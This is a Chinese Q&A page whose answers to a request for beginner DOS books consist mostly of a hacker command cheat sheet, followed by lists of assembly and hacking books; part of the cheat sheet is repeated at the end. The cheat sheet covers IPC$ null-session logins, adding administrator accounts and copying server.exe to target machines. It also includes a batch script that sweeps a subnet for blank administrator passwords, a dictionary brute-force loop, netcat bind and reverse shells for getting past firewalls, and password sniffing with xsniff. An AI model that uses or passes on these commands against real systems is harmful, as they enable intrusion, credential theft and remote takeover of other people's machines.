dos命令的書籍_推薦基本適合初學者的DOS命令書籍謝謝

Ⅰ 推薦基本適合初學者的DOS命令書籍，謝謝。

雖然多，但都是基本的！希望你可以用心去學！

DOS 命令
net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: ipc$ 登陸後映射對方C：到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名查看帳戶的屬性
net localgroup administrators 用戶名 /add 把"用戶"添加到管理員中使其具有管理員許可權,注意：
administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名開啟服務；(如:net start telnet， net start schele)
net stop 服務名停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與"目標IP"主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數："-w數字"用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數："-l[空格]數據包大小"；"-n發送數據次數"；"-t"指一直
ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參
數"/all"顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-
H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如"DEL/AR *.*"表示刪除當前目錄下所有隻讀文件，"DEL/A-
S *.*"表示刪除當前目錄下除系統文件以外的所有文件
二：
del /S /Q 目錄或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統
確認就直接刪除。（二個命令作用相同）
move 盤符路徑要移動的文件名存放移動文件的路徑移動後文件名移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命
令
at id號開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：
2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
ipadmin$svv.exe c: 或:ipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文
件）至本地C：
x 要復制的文件或目錄樹目標地址目錄名復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後，將"IP"的
server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式
（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:server.exe 登陸後，上傳本地c:server.exe至主機
ftp ip 埠用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文
本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway
addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的存檔，只讀，系統，隱藏屬性；用＋則是添加為某
屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即"DATE/T"、"TIME/T"將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如："：start"標簽）
call 路徑批處理文件名從批處理程序中調用另一個批處理程序（更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名查找某文件
title 標題名字更改CMD窗口標題名字
color 顏色值設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡
綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky )
三：
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名創建目錄
replace 源文件要替換文件的目錄替換文件
ren 原文件名新文件名重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名顯示文本文件的內容
more 文件名逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey
dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑可執行文件的文件名為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名導出注冊表
cacls 文件名參數顯示或修改文件訪問控制列表（ACL）--針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶
名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更
改(寫入)，F 完全控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
cacls 文件名查看文件的訪問用戶許可權列表
REM 文本內容在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

四：

IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將
會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本
地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

#5 五：

MYSQL 命令：
mysql -h主機地址 -u用戶名－p密碼連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格，其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by "密碼"; 增加新用戶。（注意：和上面不同，下
面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我
們改密碼和新增用戶，實際上就是用這個庫進行操作。
use mysql；
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名；
create table 表名 (欄位設定列表)；建表
drop database 庫名;
drop table 表名；刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫：（命令在DOS的mysql in目錄下執行）;注釋:將資料庫
school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。
win2003系統下新增命令（實用部份）：
shutdown /參數關閉或重啟本地或遠程主機。
參數說明：/S 關閉主機，/R 重啟主機， /T 數字設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主
機。
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數進程名或進程的pid 終止一個或多個任務和進程。
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終
止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明：/M 列出當前進程載入的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。
六：
linux系統下基本命令：要區分大小寫
uname 顯示版本信息（同win2K的 ver）
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄，注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名刪除文件，rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名建立目錄
rmdir 刪除子目錄，目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）

附：批處理命令與變數

1：for命令及變數基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定
一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0-%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2-%9指輸入的
第2-9個值；例：net use ipipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件，可使用通配符，如：(D:user.txt)和(1 1 254)(1 -1 254),{ "(1 1
254)"第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；"(1 -1 254)"說明：即從254到
1 }

command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如
(d:pass.txt)時 }。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /
user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存
在test.txt中。

/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來
隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的
IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼，直到文件中值取完為止。%%i為
用戶名；%1為輸入的IP地址（默認）。
七：
2：if命令及變數基本格式：
IF [not] errorlevel 數字命令語句如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為"真"。
例：IF errorlevel 0 命令指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行
最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句如果指定的文本字元串匹配（即：字元串1 等於字元串2），就執行後面的命令。
例："if "%2%"=="4" goto start"指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加"
"）
IF [not] exist 文件名命令語句如果指定的文件名存在，就執行後面的命令。
例："if not nc.exe goto end"指：如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令
語句或 IF [not] exist 文件名命令語句 else 命令語句加上：else 命令語句後指：當前面的條件不成立時，就指行else
後面的命令。注意：else 必須與 if 在同一行才有效。當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才
能執行，用上< >後就等於是單獨一行了；例如："if exist test.txt. <del test.txt.> else echo
test.txt.missing "，注意命令中的"."

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的
TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向
連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:log.txt
nc -L -p 80 < c:honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把
c:honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把
c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱傳送文件到對方主機
備註：
| 管道命令
< 或 > 重定向命令。"<"，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:winnt >> d:log.txt 意思是：後台執行dir，並把結果
存在d:log.txt中

>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。

如：@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二個命令分別執行二次比較看：用>>的則
是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

八：

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測
192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測
192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放端
口的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測"hostlist.txt"文件中列
出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機

九：

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址過濾IP地址
-port 埠過濾埠
-log 文件名將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以
ASCII格式輸出

Ⅱ 學匯編語言有什麼好書（最好是國外的）

王爽<匯編語言程序設計>
羅雲斌<Windows環境下32位匯編語言程序設計>
《會編的高手》
電子工業出版社出版的一套國外計算機專業教程中的一本名為談態族《80X86匯編語言》（名字我可能記得不太准確）的書，這一套書還包閉螞括《操作系統原理及實現（上、下冊）》、《數據結構及演算法分析》等數本我覺得都還不錯，不妨去讀一讀。
DOS下深入匯編和操作系統的書有:
< MS-DOS 5.0內核剖析> 最全面的DOS內核源碼剖析書.
<DOS 6.x 高級編程> 肖力
<DOS 6.22 內核分析與內存管理含弊技術>
在DOS時代,有很多掌握DOS內核的高手,而在WINDOWS時代,大部分只會可視編程,真正董
WINDOWS內核的人很少,一方面,WINDOWS較復雜,另一方面,這方面的資料很少,我從未見
國內出版社出版過WINDOWS環境用匯編編程的書(VXD領域除外),而可視編程的書卻泛濫成災，真可悲！

Ⅲ 我想自學計算機請問我要要買那些最基礎的資料書啊

1.《黑客入門》
這是我看的第一本黑客書籍，是比較初級的一些黑客知識，但是後面的實例運用到了html代碼，主要是講
網頁方面入侵知識，當時我自己也看不懂那些，因此就去把html學一下（其實也就是看看代碼而已，自己
根本寫不出啥代碼來，呵呵……）
2.《30天打造專業紅客》
任何一本寫著什麼幾天精通，幾天速成的書，其實都是不可信的，但這不是我們現在要講的問題，這本書
可以彌補上本書中的本足之處，裡面有一些內容可能講得會比較詳細些，適合初學者。
3.《防黑檔案》
這本書是東方飄雲寫的，好像就是綠色兵團的副司令吧，呵呵，我先頂一下…………
4.《黑客攻防實戰入門》
這是一本以實戰為主線的黑客書籍，大力推薦！！！必竟電腦技術本來就是要在實踐中才能提高的，光靠
理論是行不通，你可以邊看此書邊操作，相信對於你的實戰能力會有所幫助的。
上面這些都是一些黑客入門方面的書籍，其中有部分是相同，大家可擇其善者而從之！！！
5.《C語言程序設計》
不學編程的人是永遠不可能成為黑客的，因此學編程也成為我們在學黑道路上的必經之路，也是最需要精
力與耐力的過程。這本就是譚浩強寫的那本，大家也可以看看老外寫的那本《the c programe language》,
如果你能將書中的代碼都自己調試操作一遍，對於C語言基礎知識的掌握應該不成問題。
6.《VC++深入詳解》
這是一本他人根據孫鑫的視頻教程編寫的一本書，因此這本書也就有其配套視頻了，地址如下：
http://tech.163.com/special/0009159F/vc.html
7.《IBM-PC匯編語言程序設計》
這是清華大學出版的，雖然有點過時了，是本16位機器時代的，與現在的win32,win64有點差別，但其本
質也是大同小異的，相信對於想學習逆向分析的戰友們，匯編也是一項必修課啊，關於此書，各位可以看
看中山大學的匯編語言視頻教程，其教學方式也是比較新穎的，大家一看便知，地址如下：
http://bbs.topsage.com/dispbbs_121_164375_1.html
如果想要看在線視頻，可通過下面地址查看：http://202.116.65.193/Ncourse/hbyy/hb01/，
將後面的hb01改為02，03……即可，不過很慢，緩沖都要N久，我是等得不耐煩了，呵呵
8.《windows環境下的32位匯編語言程序設計》
就是羅雲彬寫的那本，如果你學完了上本匯編書籍或視頻，那麼就可以開始學習win32匯編了，要知道這本
書我是用手機看的，呵呵，不容易啊，因為缺乏實踐，因此自己學得也不咋滴，自己是打算先簡單看一遍
，簡單了解個大概，再看第二遍，這遍以實踐操作為主，最後再系統地復習一遍，這項任務，本人尚未完
成啊，以上意見也只是給大家做個參考而已，希望對大家有所幫助。
9.《ASP從入門到精通》
想學腳本入侵的戰友，腳本語言是一定要學的，有機會也最好自己做個博客之類的站點。這本書後面有很
多的實例項目，如後台管理，收費系統等等。另外還有一本我自己看過的關於asp的書——《ASP可視化編
程與應用》，此書是在dreamweaver下面的實踐操作，也算是在學asp的同時，也學習一下dreamweaver的
使用，一舉兩得。這兩本書中對html以及vbscript均有所講解，因為asp中可嵌入vbscript,javascript.
10.《php高手寶典》
此書我是沒看過，只是看了下目錄與開頭而已，打算後面有時間再補看一下，因此對此書我也沒有什麼發
言權了，有看過的戰友可以發表一下意見。
11.《黑客反匯編揭秘》
這是一本關於逆向分析的書，與其配套的還有一本叫《黑客調試技術揭秘》，反匯編這本書網上有電子書
，大家可下載來看，pdf格式的，但是調試這本書我沒找到，在網上寫著調試的書名，下載下來才發現是反
匯編那本書.這兩本書對匯編知識均有一定的要求，因此建議大家先學完匯編再看。
12.《網路黑客加密與解密》
這本書裡面有一些腳本入侵方面的一點知識，內容較少，主要是講加解密方面的知識，後面有大部分的破
解實例講解，但注釋較少，我自己當時也是看得迷糊迷糊的（沒辦法，自己匯編能力差點，呵呵）
13.《加密解密全方位學習》
這本書我是在圖書館看到的，適合加解密初學者，因為這本書要求的預備知識不高，只要有點C語言基礎就
可以，裡面會講到一些相對簡單些的匯編指令，以及crackme的簡單製作，還有注冊機的編寫(個人覺得不
是很詳細)
14.《加密與解密》
就是看雪學院那本書，第三版快出來了，就在這一二月份吧！我看的是第二版的電子書，還沒看完，這本
書在加解密方面寫得算是比較完整詳細的了，而且是從基礎講起，循序漸進，大力推薦，若要學習逆向工
程，看雪學院也確實是個不錯的地方。
15.《shellcode編程揭秘》
這是一本關於緩沖區溢出攻擊的書，我自己也沒看過，不過電子書倒是有，就放在郵箱裡面，呵呵，打算
後面再看，關於溢出攻擊的書還有很多，如《網路滲透技術》，《緩沖區溢出攻擊檢測，預防，剖析》，
《the shellcode handbook》
16.《深入理解計算機系統》
此書也是我在圖書館借的，被我霸佔了半年之久，這次又被我借回來復習一下了（真對不起各位書友啊，
呼呼……），這是一本站在程序員的角度寫的一本書，因此也必須要有C語言基礎，要是有unix系統的操作
經驗會更好，因為這本書中的代碼就是在UNIX下調試操作的。相信這本書對於你學出更好的代碼會有一定
的幫助，其中還有特別的一章用來講解如何編寫高效的程序，並以一個實例代碼來講解，一步步地進行完
善，最終寫出一個高效率的程序。這本書也是學溢出攻擊方面的基礎知識，在安全焦點上也說這本書是《
網路滲透技術》的基礎知識，但看完這本書也不一定能看懂網滲，呵呵……
17.《rootkit:windows內核安全防護》
內容簡介
本書是目前第一本關於rootkit的詳盡指南，包括rootkit的概念、它們是怎樣工作的、如何構建和檢測它們
。世界頂級軟體安全專家、rootkit.com創始人Greg Hoglund和James Butler向大家詳細介紹攻擊者是如何
進入系統並長期駐留而不會被檢測到的，以及黑客是如何摧毀Windows XP和Windows 2000內核系統的，
其概念可以應用於現代任何主流操作系統。通過本書，讀者可以全面掌握rootkit，提升自己的計算機安全
防範能力.
18.《0day安全：軟體漏洞分析技術》
四月份剛出版的，看雪論壇的，有看過一部分學得還不錯，適合對溢出感興趣的戰友們。要告訴你點常識…雖然多，但都是基本的！希望你可以用心去學！

DOS 命令
net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: ipc$ 登陸後映射對方C：到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名查看帳戶的屬性
net localgroup administrators 用戶名 /add 把"用戶"添加到管理員中使其具有管理員許可權,注意：
administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名開啟服務；(如:net start telnet， net start schele)
net stop 服務名停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與"目標IP"主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享
